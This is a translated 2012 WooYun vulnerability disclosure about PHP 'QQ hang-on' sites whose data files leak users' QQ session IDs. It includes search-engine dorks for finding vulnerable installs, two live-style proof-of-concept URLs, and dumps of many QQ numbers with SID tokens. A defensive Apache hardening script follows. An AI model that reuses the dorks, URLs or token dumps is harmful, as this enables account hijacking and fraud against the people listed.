
Vulnerability summary (followers: 24)

Bug ID: wooyun-2012-010020

Title: PHP online QQ hang-on system leaks personal privacy

Vendor: small application

Author: Volltin

Submitted: 2012-07-23 10:59

Fixed: 2012-07-23 10:59

Published: 2012-07-23 10:59

Vulnerability type: insecure default configuration

Severity: low

Self-assessed Rank: 5

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2012-07-23: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2012-07-23: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The PHP online QQ hang-on system leaks personal privacy, allowing the affected QQ accounts to be logged into at will.

Detailed description:

The PHP online QQ hang-on system leaks personal privacy: the leaked data allows login to QQ through the mobile Tencent site (手机腾讯网) SID, which can then be used for fraud, social engineering and so on.
This is a currently very popular system. Because the permissions on its data file are set incorrectly, the file can be downloaded freely, yielding the SIDs of the users' QQ accounts.
As is well known, with a QQ number and its SID one can log into QQ on the mobile Tencent site.
Two variants are currently in wide use; their search engine keywords are, respectively:
1. "本站现在24小时全天挂机 inurl:look.php"
2. "24小时挂Q系统 挂Q状态查询 提取SID码"
Their data files are, respectively:
1. xx.com/gq_date.dat
2. xx.com/db.dat
Of course, some sites have modified the system or set permissions properly, and on those this vulnerability does not apply.

Proof of concept:

http://tcsq.by.76at.com/gq_date.dat

tcsq,2215335746,AYHGwqNTPBHeLcaZyImus4ui,2012-02-17 13:35:29 ;tcsq,592600540,AeHSLAtdKAJs09U3qr3ayNai,2012-02-17 13:35:54 ;tcsq,822481102,AX2x0xCTKjAmulH3WNynLOyi,2012-02-17 13:36:28 ;tcsq,1113435604,AU_pjPX2eD4ERB3sHATBh0ai,2012-02-17 13:36:51 ;tcsq,1275285347,AdfZHos8ql-NPBBeJKPdQbCi,2012-02-17 13:37:04 ;tcsq,754540252,Ae5lBJVpuN4RHgo9U9xoyICi,2012-02-17 13:37:25 ;tcsq,1914269127,AYEmFi-79W4EFrOLkpNibqmi,2012-02-17 13:38:19 ;tcsq,1834188441,ARZKhhFpFxSmRUUuiQYny6Ki,2012-02-17 13:39:28 ;tcsq,1970536142,AXQIH9RCSoWvtctHxPxY5g2i,2012-02-17 13:39:48 ;tcsq,1963513081,AZNu1rW34zkeixfsYmoA2nmi,2012-02-17 13:40:06 ;tcsq,1538885353,AUxXJ-X08hZLdLGByxCMA9Si,2012-02-17 13:40:24 ;tcsq,1091071600,AUmdMWqvQPADRoj-nfnMuCui,2012-02-17 13:40:47 ;tcsq,1147375552,AXlrEOAj3K4Jb4W7LDqrlIai,2012-02-17 13:41:03 ;tcsq,1393317690,AQopljryHnzCWtFWIJCEkk6i,2012-02-17 13:41:15 ;tcsq,2232334876,AcbBgA0k9IF96ZqRr-nWzlyi,2012-02-17 13:41:31 ;tcsq,1445447629,AYpMn0D0FGMD4X-3e9RWFaqi,2012-02-17 13:42:33 ;tcsq,1440141034,AXxGKDaf8oypzDob3XvlK56i,2012-02-17 13:42:47 ;tcsq,798003012,AbXEdvRCLPqqS_wMp9kJfbei,2012-02-17 13:43:04 ;tcsq,804616319,Ab-BCISQA7Ls1zgLfQ3BXlei,2012-02-17 13:43:16 ;tcsq,281994546,Aajkmw2n_TTYOUi7EJJPugmi,2012-02-17 13:43:32 ;754540252,287206447,AfOABAcJOJD2-Utd-MooWRai,2012-02-17 13:44:06 ;754540252,184421570,AfkWC73cMypAeee__CsWXRii,2012-02-17 13:44:23 ;754540252,799892085,ASYdV2HWOzFw83lFw6Wvn0Gi,2012-02-17 13:44:38 ;754540252,352648731,ARe39EqqSHJ-6RQrProu1Oui,2012-02-17 13:45:01 ;754540252,442685927,Abv3RCSdNXr1FP9-aWWi11ui,2012-02-17 13:45:14 ;


http://shenyaw.cpanel.my/db.dat

375988497,884572452,nqqchatMain&sid=AbGmHyZDy7Cbd3wS3ewE6xhL&myqq,2011-12-13 11:37:07 ;375988497,870699770,Ac2MMg48qf29dLtt0O2ItXWF&myqq,2011-12-15 11:07:21 ;375988497,188750301,AXIAK1AN9LRzW95xlmdip2PY&myqq=188750301,2011-12-21 23:25:08 ;375988497,572505757,AaZhh6Mb4nSCUna_0sCMCOPc&myqq=572505757,2011-12-21 23:40:39 ;375988497,94536422,AdVASRHRsYhf0zXd8R9dBbvd&myqq=94536422,2011-12-21 23:46:34 ;375988497,1265652343,AXZh51KwLRRB9desFtvIiqBU&myqq=1265652343,2011-12-22 09:47:37 ;375988497,1265652347,nqqchatMain&sid=AforYi1qz2g4buW9tej634kY&myqq=1265652347,2011-12-22 09:56:11 ;375988497,993425822,ARNB5SsvRQM9_eKA1VrZOIzX,2012-01-11 19:00:05 ;375988497,343625052,AcXB3Fc2f9OIXEhFy4lG9cVN,2012-01-11 19:01:19 ;375988497,541269758,AR6s7wl8pH6WGB_GJKNoB0NN,2012-01-11 19:01:57 ;375988497,1204366758,AQ8ePajtz-wn9PQtsVPeOXQ5,2012-01-20 15:24:03 ;375988497,812851168,AVSS62mNZ4sahkAVCi580DHD,2012-01-24 16:27:27 ;375988497,896221565,AXE6RiXbjCXPvkfvQ_8N4LpV&aid,2012-02-5 09:26:56 ;375988497,283331368,AY-NEumDCHdxgqAyh77ryfPZ,2012-02-8 00:08:59 ;375988497,549861999,ATIuGKvZXW_TrUSTXW4V2rdu,2012-02-8 11:50:43 ;375988497,277910488,Ad1PlaxZC-xo7yZEsTri9BUZ&myqq=277910488,2012-02-9 10:01:10 ;375988497,594500226,ATPbC0HlWopmKplnbIlja3a8,2012-02-19 10:22:22 ;375988497,993401021,ARCA9App5QpZ0pXSok4TPh69,2012-02-19 10:23:35 ;375988497,859900328,AWSs3oKcwomQV975fbjq84gF,2012-03-12 21:47:12 ;375988497,1045125801,ARu3qWs-d2YhWfY_ZC9wgMA8,2012-03-13 02:21:22 ;

Remediation:

Rename the data file; the most direct fix is to deny web access to it.
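The remediation above is a one-line instruction; the following is an added example (not code from the report or from either hang-on system) of how an operator on a typical Apache shared host could carry it out and verify it. It assumes Apache 2.4 with `AllowOverride` permitting `.htaccess` files, and takes the document root as the `DOCROOT` argument; the file names `gq_date.dat` and `db.dat` come from the report, and the script treats any `*.dat` under the document root the same way. Moving the data file outside the document root entirely would be the stronger fix; this script covers the case where the application insists on a path under the web root.

```shell
#!/bin/sh
# Defensive audit and hardening for PHP "online QQ" hang-on installations.
# Finds serialized SID data files (gq_date.dat, db.dat, any *.dat) under the
# web document root, writes an .htaccess rule so Apache refuses to serve
# them, and tightens their file mode so other local accounts on a shared
# host cannot read them either.
#
# DOCROOT is an assumption: pass the directory the web server serves.

# list_exposed_data_files DOCROOT: print every *.dat under DOCROOT, one per line
list_exposed_data_files() {
    find "$1" -type f -name '*.dat' 2>/dev/null | sort
}

# count_exposed_data_files DOCROOT: number of such files (0 means nothing to fix)
count_exposed_data_files() {
    list_exposed_data_files "$1" | wc -l | tr -d ' '
}

# deny_data_files DOCROOT: append a deny rule for *.dat to DOCROOT/.htaccess
# (Apache 2.4 syntax) if it is not already there, then chmod 600 each data file
deny_data_files() {
    docroot=$1
    htaccess="$docroot/.htaccess"
    # idempotent: only add the rule once
    if ! grep -qF '<FilesMatch "\.dat$">' "$htaccess" 2>/dev/null; then
        cat >> "$htaccess" <<'EOF'
# Never serve serialized SID data files to web clients
<FilesMatch "\.dat$">
    Require all denied
</FilesMatch>
EOF
    fi
    list_exposed_data_files "$docroot" | while IFS= read -r f; do
        chmod 600 "$f"
    done
}

# is_denied DOCROOT: exit 0 if DOCROOT/.htaccess carries the deny rule
is_denied() {
    grep -qF 'Require all denied' "$1/.htaccess" 2>/dev/null
}

# file_mode PATH: the ten-character mode column of ls -l, e.g. -rw-------
file_mode() {
    ls -l "$1" | cut -c1-10
}

# Usage:
#   . ./harden_datfiles.sh
#   list_exposed_data_files /home/user/public_html
#   deny_data_files /home/user/public_html
#   is_denied /home/user/public_html && echo "deny rule present"
```

After running it, request the data file over HTTP once from a browser and confirm the server answers 403 rather than the file contents; if it still serves the file, `AllowOverride` is off for that directory and the same `<FilesMatch>` block has to go into the virtual host configuration instead.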

Copyright notice: when reposting, please credit the source: Volltin@乌云


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused

Vulnerability Rank: 4 (WooYun assessment)